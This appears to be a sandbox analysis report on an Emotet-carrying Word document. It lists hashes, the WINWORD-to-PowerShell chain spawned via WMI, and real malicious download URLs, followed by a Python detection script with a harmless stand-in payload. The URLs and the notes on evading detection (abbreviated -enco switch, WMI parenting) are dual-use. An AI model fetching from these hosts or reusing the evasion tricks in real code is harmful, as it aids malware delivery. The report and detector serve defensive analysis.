Field | Value
---|---
File name | 081443952688306196.doc
Full analysis | https://app.any.run/tasks/e69610ef-8240-4826-a3ee-f4a5f25e6e8a
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.
Analysis date | October 14, 2019, 07:54:59
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | -
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Incredible Soft Computer, Subject: Burgs, Author: Humberto Lockman, Keywords: Automotive & Kids, Comments: Poland, Template: Normal.dotm, Last Saved By: Alicia Bernhard, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 11 13:56:00 2019, Last Saved Time/Date: Fri Oct 11 13:56:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 170, Security: 0
MD5 | AB619F85278DAF9465EE88A105ED5A7A
SHA1 | 3E15D236C66998B7EA5C375E850BC48389D4A2D0
SHA256 | BB8D98721DCBA1D7FC8E745496A527247FB563DE48207541A7AC36299AF79DA5
SSDEEP | 6144:oGTmkq2KUzSznLx36rRnQnT2PxQdDYsz3coF0HWz46H:oGTmkqLUGzt36s2Cd8sb5F00R
Extension | Type | Score
---|---|---
.doc | Microsoft Word document | 54.2
.doc | Microsoft Word document (old ver.) | 32.2
Property | Value
---|---
Title | Incredible Soft Computer
Subject | Burgs
Author | Humberto Lockman
Keywords | Automotive & Kids
Comments | Poland
Template | Normal.dotm
LastModifiedBy | Alicia Bernhard
RevisionNumber | 1
Software | Microsoft Office Word
TotalEditTime | -
CreateDate | 2019:10:11 12:56:00
ModifyDate | 2019:10:11 12:56:00
Pages | 1
Words | 29
Characters | 170
Security | None
CodePage | Windows Latin 1 (Western European)
Company | McClure Group
Lines | 1
Paragraphs | 1
CharCountWithSpaces | 198
AppVersion | 16
ScaleCrop | No
LinksUpToDate | No
SharedDoc | No
HyperlinksChanged | No
TitleOfParts | -
HeadingPairs | -
Manager | Bartell
CompObjUserTypeLen | 32
CompObjUserType | Microsoft Word 97-2003 Document
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
2196 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\081443952688306196.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | |
3756 | powershell -enco <encoded command omitted from the report> | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | |
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2196 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA841.tmp.cvr | — | — | —
3756 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UWRS56Q9S5B73T3EDF5S.temp | — | — | —
2196 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | D32FE9CCFDD5F4E2F610BED8E03EA74F | 9C96E463C3A65E7369EFC57B07E79A2A6CA7C423EEAC18FED21DEAD7C91F9659
2196 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\62CAA03C.wmf | wmf | 4463C8C5F739916086FD62D95128D2A9 | 4A1AEFDF3CFBEDA55DD0E6E6671B6C27BCC8646BDFD671EFCBA80AAFEF294868
2196 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A92BDAA.wmf | wmf | 35AC228007D08827B1B317C395394F4C | 6E0CF1443FABEE68B9C46DF35092513FC1D63FC43827F9C69649CCC789F47293
2196 | WINWORD.EXE | C:\Users\admin\Desktop\~$1443952688306196.doc | pgc | 80166867D200E41CE14BE44FE3113282 | 0885C595ACCE28664C685CFD0F90C9E95F087692C9D3C279519393D0486CB4DB
2196 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\081443952688306196.doc.LNK | lnk | 7251B23E0C784B4AE867671CC8EC7804 | 4125574192F3EF62448658DC4E3E12FD971F99A6D6B73EA036B96CB0D55316C3
3756 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2196 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FCAF5114.wmf | wmf | 61EF43A584A06CAFB5E9F44852068830 | 632CA48E3027F6C3BFBF318624607AA812A56CAB65043E20BA3036443691A01F
3756 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39bdcc.TMP | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3756 | powershell.exe | GET | — | 45.56.100.50:80 | http://www.denedolls.com/wp-content/upgrade/2log638/ | US | — | — | malicious |
3756 | powershell.exe | GET | 404 | 77.92.74.183:80 | http://rupertsherwood.com/Templates/yug9dpo98155/ | GB | html | 315 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3756 | powershell.exe | 77.92.74.183:80 | rupertsherwood.com | UK-2 Limited | GB | suspicious |
3756 | powershell.exe | 107.180.27.177:443 | www.noblesproperties.com | GoDaddy.com, LLC | US | unknown |
3756 | powershell.exe | 45.56.100.50:80 | www.denedolls.com | Linode, LLC | US | unknown |
3756 | powershell.exe | 160.153.93.130:80 | www.mikevirdi.com | GoDaddy.com, LLC | US | suspicious |
Domain | IP | Reputation
---|---|---
www.mikevirdi.com | — | malicious
dns.msftncsi.com | — | shared
rupertsherwood.com | — | unknown
www.noblesproperties.com | — | unknown
www.denedolls.com | — | malicious
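The process table above records the chain that matters for detection: WINWORD.EXE opens the document, and powershell.exe then appears with wmiprvse.exe as its parent (the macro created the process through WMI, so the usual WINWORD → powershell parent link is not there) carrying an abbreviated `-enco` switch, after which the URLs in the HTTP table are requested. Two details trip up naive rules: powershell.exe accepts any unambiguous prefix of `-EncodedCommand`, so `-enco`, `-enc`, `-ec` and `-e` all work, and the payload is base64 over UTF-16LE, not UTF-8. The Python below is an added example written for this page, not code from ANY.RUN or from the sample; it checks process events for the chain, decodes the payload the way PowerShell does, and compares extracted URLs with the report's HTTP and connection indicators. Because the report omits the encoded command, the script embedded in the sample event is a constructed harmless stand-in that only carries the report's URLs; the third process row (a benign control) and the `https://www.noblesproperties.com/` URL are constructed as well.

```python
import base64
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed stand-in for the downloader script (the report does not include the
# real encoded command). It carries the report's URLs the way an '@'-joined list
# would, but only prints them; it downloads nothing.
SAMPLE_SCRIPT = (
    "$u='http://www.denedolls.com/wp-content/upgrade/2log638/"
    "@http://rupertsherwood.com/Templates/yug9dpo98155/"
    "@https://www.noblesproperties.com/'.Split('@');Write-Output $u"
)


def encode_command(script: str) -> str:
    """Encode a script as -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


@dataclass
class Proc:
    pid: int
    image: str
    cmdline: str
    parent_image: str


# Constructed process events mirroring the report's process table (PIDs, images
# and parents as listed there); the third row is a benign control, not from the report.
SAMPLE_PROCS = [
    Proc(2196, "WINWORD.EXE",
         r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\081443952688306196.doc"',
         "explorer.exe"),
    Proc(3756, "powershell.exe", "powershell -enco " + encode_command(SAMPLE_SCRIPT), "wmiprvse.exe"),
    Proc(4100, "powershell.exe", "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1", "cmd.exe"),
]

# Network indicators taken from the report's HTTP and connection tables.
REPORT_URLS = {
    "http://www.denedolls.com/wp-content/upgrade/2log638/",
    "http://rupertsherwood.com/Templates/yug9dpo98155/",
}
REPORT_HOSTS = {"www.denedolls.com", "rupertsherwood.com", "www.noblesproperties.com", "www.mikevirdi.com"}

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def find_encoded_payload(cmdline: str):
    """Return the argument of -EncodedCommand, or None.

    powershell.exe accepts any unambiguous prefix of the switch name, so a
    literal match on "EncodedCommand" misses "-enco" as seen in the report."""
    toks = cmdline.split()
    for tok, nxt in zip(toks, toks[1:]):
        if tok[0] in "-/" and len(tok) > 1:
            sw = tok[1:].lower()
            if sw.startswith("e") and "encodedcommand".startswith(sw):
                return nxt
    return None


def decode_payload(b64: str):
    """Decode base64 + UTF-16LE as PowerShell does; None if it is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


URL_RE = re.compile(r"""https?://[^\s'"@;)]+""")


def extract_urls(script: str):
    return URL_RE.findall(script)


def suspicious_chains(procs):
    """Flag powershell with an encoded command launched from Office or via WMI.

    The WMI path (Win32_Process.Create from VBA) makes wmiprvse.exe the parent,
    exactly as in the report, so a rule keyed only on an Office parent misses it."""
    hits = []
    for p in procs:
        if p.image.lower() != "powershell.exe":
            continue
        payload = find_encoded_payload(p.cmdline)
        if payload is None:
            continue
        parent = p.parent_image.lower()
        if parent in OFFICE_IMAGES or parent == "wmiprvse.exe":
            script = decode_payload(payload)
            urls = extract_urls(script) if script else []
            matched = [u for u in urls if u in REPORT_URLS or urlsplit(u).hostname in REPORT_HOSTS]
            hits.append({"pid": p.pid, "parent": p.parent_image, "urls": urls, "ioc_matches": matched})
    return hits


if __name__ == "__main__":
    for hit in suspicious_chains(SAMPLE_PROCS):
        print(hit)
```

Run as-is it prints one hit, PID 3756 with parent wmiprvse.exe and all three URLs matched against the report's indicators; the control row with `-ExecutionPolicy` is not flagged because that switch is not a prefix of `-EncodedCommand`. In a real deployment the event list would come from EDR or Sysmon process-creation records, and a decode failure (non-base64 argument) is itself worth alerting on rather than silently ignoring.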